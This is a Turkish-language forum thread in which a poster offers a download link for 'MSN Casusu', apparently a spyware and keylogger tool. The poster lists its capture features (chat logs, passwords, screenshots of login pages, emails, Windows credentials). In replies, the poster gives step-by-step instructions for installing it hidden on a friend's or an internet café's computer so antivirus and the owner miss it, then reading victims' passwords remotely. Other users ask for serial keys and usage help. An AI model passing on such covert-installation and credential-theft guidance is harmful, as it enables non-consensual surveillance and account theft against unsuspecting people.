Msn Casusu Tabiki Yine Ben Lichestien dan :D

Lichestien

New member
Reaction score
0
* kurban MSN kimlerle ne yazışmış+yazıştığı kişilerin msn leri )
* kurban ICQ
* keylogger
* send mail istediğiniz aralıkta mail bildirimi
* girdiği tüm siteleri fotografını yakalama ve mail atma
* istenirse sadece şifre girdiği siteler yani her html penceresinin resmini göndermez sadece user ve password girdiği siteleri
* kurbanın MSN+ICQ VS. chat şifreleri
* gizli olması
* desktop screenshots
* word ve excel vs. hangi dosyaları acıp calısmıs ( değişikler neler )
* gün içersinde kimlere mail atmış - almıs ve neler yazmıs ( keylogger dan farklı )
* xp oturumunda çalışan kullanıcı isimleri şifreleri ( server sistemler dahil )
*. vs

MSN CASUSU
http://www.exploreanywhere.com/webmailspy-setup-sw.exe

eyvallah arkadaşım program için serialleri varsa verirsen sevinirim

peki nasıl çalışıyo biraz açıklarsan çok sevinirim paylaşımın için saol

serialleri orada yok bi yardımcı bulunursan iyi olur(emeğe saygı)

paylaşım için saol

kardeş kullanımından biraz bahsedermisin

abii bu program nedir nasıl çalışır ne yapmamız gerekir ellerine saglık ama biraz daha detaylandırırsan bizleri herkes eminim dahada memnun olcak..şimdiden çok saol..

Programı kurarken size bir soru soruyor Do you want unistaller flan filan eğer evde iseniz hayır eğer kafeye ise evet diyin.Sonra program basit anlatim bu programı kurduktan sonra koydugunuz şifreyi unutmayın.Çünkü bu çift amaçlı ilk once kendi evinize koyucaksınız daha sonra ise gidip bi arkadaşısınızın pc sine veya bi internet cafeye kurucaksınız.Arkadaşınızın veya cafenin pc sini yukledikten sonra yine şifre koy kısmına evde kurarken koydugunuz şifreyi koyucaksınız.Sonra ise Start Record diyip açık bırakıcaksınız ve options tan hide yapıcaksınız. :D daha sonra eve gidin programı sizde açın ve bekleyin o arkadaşınız ve o cafeden herhangi biri o makinadan mailine girdiğinde şifresi sizin ekranda gorunmuş oluyor.Gerisi size kalmış :D

Tekrar söylüyorum

Kurarken eve kuruyorsanız yani kendi evinize ---> unistaller setup dediğinde eveti tıklayın.

Cafeye veya birisinin makinasına kurdugunuzda unistaller setup a hayır diyin.Çünkü oznm kaldıramıcak bide optionstan hide yaptınmı prgoramı güzel oluyor çünkü ne spy killer nede virüs programları nede cafe sahibi algılamıyor :D

Bide son olarak evde iken start record yağpmayın sizinkini kaydediyor çünkü :D

neyse bide not: bazen program beleş oldugu için sapıtıyor yani makinen çökmüyor ama şifreyi sana gondermiyor o makinada yani kurbanın makinasında hide olmuş vaziyette saklıyor.Neyse anladınız siz
Ben çat pat anlattım biraz deneyin anlarsınız

bu arada programın seriali su an mevcud değil ama yakın zamanada çıkar kendi orjinal sitesinden biraz özelliklerini okuyun full versiyonunda bunları yapmaya gerek bile kalmıyor :D yakında çıkar seriali

Kolay gelsin

ewet nası çalışıo biraz anlatır mısın
daha açık
saolasın:)

Bunun nasil caliscagini anlatirmisin mesela ben istediim kisinin sifresini mi yazcam???????

Geri